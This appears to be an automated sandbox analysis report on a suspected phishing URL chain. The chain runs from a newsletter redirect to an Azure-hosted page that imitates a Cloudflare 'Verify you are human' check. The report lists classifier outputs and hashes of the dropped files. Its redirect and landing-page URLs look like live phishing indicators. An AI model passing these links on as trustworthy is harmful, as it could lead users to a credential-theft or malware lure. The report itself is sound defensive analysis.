                                                                                                                                                                                                                                • VT rate limit hit for: https://www.google.se/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M
                                                                                                                                                                                                                                No simulations
                                                                                                                                                                                                                                InputOutput
                                                                                                                                                                                                                                URL: https://scenesaves.me/?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":[],
                                                                                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Cloud flare needs to review the security of your connection before proceeding",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Checking if the site connection is secure",
                                                                                                                                                                                                                                "prominent_button_name":"Verifying...",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Checking if the site connection is secure",
                                                                                                                                                                                                                                "prominent_button_name":"Verifying...",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Checking if the site connection is secure",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Verify you are human",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Cloud flare needs to review the security of your connection before proceeding.",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Verify you are human",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Verify you are human",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Cloudflare needs to review the security of your connection before proceeding.",
                                                                                                                                                                                                                                "prominent_button_name":"Verify you are human",
                                                                                                                                                                                                                                "text_input_field_labels":["Verify you are human"],
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Verify you are human",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Verify you are human",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Verify you are human",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Cloud flare needs to review the security of your connection before proceeding.",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Cloudflare needs to review the security of your connection before proceeding.",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.html Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Cloudflare needs to review the security of your connection before proceeding.",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":["Verify you are human"],
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 80 x 87, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.002585360278503
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlHIxTwlpBxl/k4E08up:6v/lhP2aTB7Tp
                                                                                                                                                                                                                                MD5:218299A159DD0C211DB03E54CCBFE8F4
                                                                                                                                                                                                                                SHA1:F4CA842ACDEA95CDD26AA406814F5ED2DE8EB7FA
                                                                                                                                                                                                                                SHA-256:D58E7906D67221A0A1151AFB2DA837098C52D592D59577D596AAAED9F69CE431
                                                                                                                                                                                                                                SHA-512:FB8D586F2970420AF736EEE0D1509129ADB1CA5EFBB84BEC25877B0ACBF7532F9AFF4EED4FBF8A165E7DBCBF8ED543B7BFEA99BB9F04316D8DA081926B2A3E08
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...P...W......vUB....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                Entropy (8bit):4.180365114215879
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                                                                MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                                                                SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                                                                SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                                                                SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1200 x 1200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):39856
                                                                                                                                                                                                                                Entropy (8bit):7.655678219260851
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:ZKgL/MkWeoPffzFix/0ZrUOctZjVX2g6XvM/z+uWbg4RO:Zr72fLbpFcjjVX2x6LWbRRO
                                                                                                                                                                                                                                MD5:A0B27AE4E940FBF1EC6BDB72DA4601E3
                                                                                                                                                                                                                                SHA1:282AC84C78F76A9939F84B1BA76F87829D9091A7
                                                                                                                                                                                                                                SHA-256:292CA7B17E46E208AA117DE746D64E4724E83B3D5AC9D70E2F841E2CC03EB94B
                                                                                                                                                                                                                                SHA-512:7EF83A5F56F6C46D2EA63D4240A6E029893EB4906C009046E78CAF67483FFD7512793F9BC82FC6C7F2149AA580F171BECE0C671BC58F3EA331DD0B37D3B89FF7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR..............!......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................tIME.....7.........IDATx...w.eU}......s.4.J.;.... ..QDP.{l.......Ec....K.,.1.$.D..hP.(.....9{}...., ...{..9....>....{..]{m.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                Entropy (8bit):4.180365114215879
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                                                                MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                                                                SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                                                                SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                                                                SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 75 x 82, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.035372245524405
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPly3ckxl/k4E08up:6v/lhPnk7Tp
                                                                                                                                                                                                                                MD5:C33C25632FA0395326A8EA6E9976836D
                                                                                                                                                                                                                                SHA1:320E8D2455095D6C6144B651D2F63FD8CA995FA1
                                                                                                                                                                                                                                SHA-256:B88BEF2BC89F1DF272C99C552C12A429B1615CE30A0EF6218A7007ED22831FE7
                                                                                                                                                                                                                                SHA-512:65F8E8F18F43599836B8E345CF42D0EBEA0B712509330D54D04DE80C6B33C9B6625B30FB0575E5AEE3DE7E3EE23F65F3DA91669CEE9539C591426CDA4272B09A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccfd8e9a8628cba/1727989079444/hYYFsUQiuKDr-sN
                                                                                                                                                                                                                                Preview:.PNG........IHDR...K...R.............IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 43 x 14, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.068159130770306
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPl+xt/G7lCyxl/k4E08up:6v/lhPmu7gy7Tp
                                                                                                                                                                                                                                MD5:43114A0609C99A8D60C4CFBB6F45F8D2
                                                                                                                                                                                                                                SHA1:52493226F67A7630F1E2F21613837BFBB9A3A15A
                                                                                                                                                                                                                                SHA-256:F65A215E94C1BBAF2C745E7398AF792BFF24943FC03359D31E82C43C8C53C49B
                                                                                                                                                                                                                                SHA-512:2326CB913D72501BC4179169E9A41317214A49E6A4B5ECAC3C0073D53B3C8D2B87C1597724889C701E45375B02ACDE57848675394ECE02D0BC55F8BDF9AE0AA8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...+.........9^r.....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (47261)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):47262
                                                                                                                                                                                                                                Entropy (8bit):5.3974731018213795
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                                                                                                                                                                MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                                                                                                                                                SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                                                                                                                                                SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                                                                                                                                                SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
                                                                                                                                                                                                                                Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 70 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.035372245524405
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlbmt/z/1xl/k4E08up:6v/lhPQtj17Tp
                                                                                                                                                                                                                                MD5:9BC9560A5219AD51E1D8F55EA776A156
                                                                                                                                                                                                                                SHA1:2F4FD8B45C8C3BBE3226D89E97BC4D935A326200
                                                                                                                                                                                                                                SHA-256:74AFA64601EFBFDA9375847F937D9500D7A92B5ABEE350D184D2D162EC05DE1E
                                                                                                                                                                                                                                SHA-512:7624BF3E909C81D759436B854E72BC20653764104792B1B5B07B1873ED687207F955DADC96DA41C9BD0B0148A518EC14BD0B83C55C0743A5F641D3E22C3B0106
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...F...Y............IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 75 x 82, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.035372245524405
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPly3ckxl/k4E08up:6v/lhPnk7Tp
                                                                                                                                                                                                                                MD5:C33C25632FA0395326A8EA6E9976836D
                                                                                                                                                                                                                                SHA1:320E8D2455095D6C6144B651D2F63FD8CA995FA1
                                                                                                                                                                                                                                SHA-256:B88BEF2BC89F1DF272C99C552C12A429B1615CE30A0EF6218A7007ED22831FE7
                                                                                                                                                                                                                                SHA-512:65F8E8F18F43599836B8E345CF42D0EBEA0B712509330D54D04DE80C6B33C9B6625B30FB0575E5AEE3DE7E3EE23F65F3DA91669CEE9539C591426CDA4272B09A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...K...R.............IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                Entropy (8bit):4.180365114215879
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                                                                MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                                                                SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                                                                SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                                                                SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 4 x 87, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                Entropy (8bit):4.002585360278503
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlJotnlB/Hxl/k4E08up:6v/lhP8tl1H7Tp
                                                                                                                                                                                                                                MD5:DC7E30C272EB21F594C52C1F71CC7F1D
                                                                                                                                                                                                                                SHA1:499C11D07083417BB514D79C7AE28CD3A1C093CD
                                                                                                                                                                                                                                SHA-256:CD7719C40190AFE833E1940CB96EB872C608E5B697FEDC22575B29526C53E7D7
                                                                                                                                                                                                                                SHA-512:FC68FBD3BE5F353FEEF03EC1C7914953ECF39ED74C9228A883D9D19BCB424BA6840030AFD942CDFEB692BFC209FE0370452400209C22FAECC1078E45FF36A87A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......W.......sp....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                Entropy (8bit):4.180365114215879
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                                                                MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                                                                SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                                                                SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                                                                SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                Entropy (8bit):4.180365114215879
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
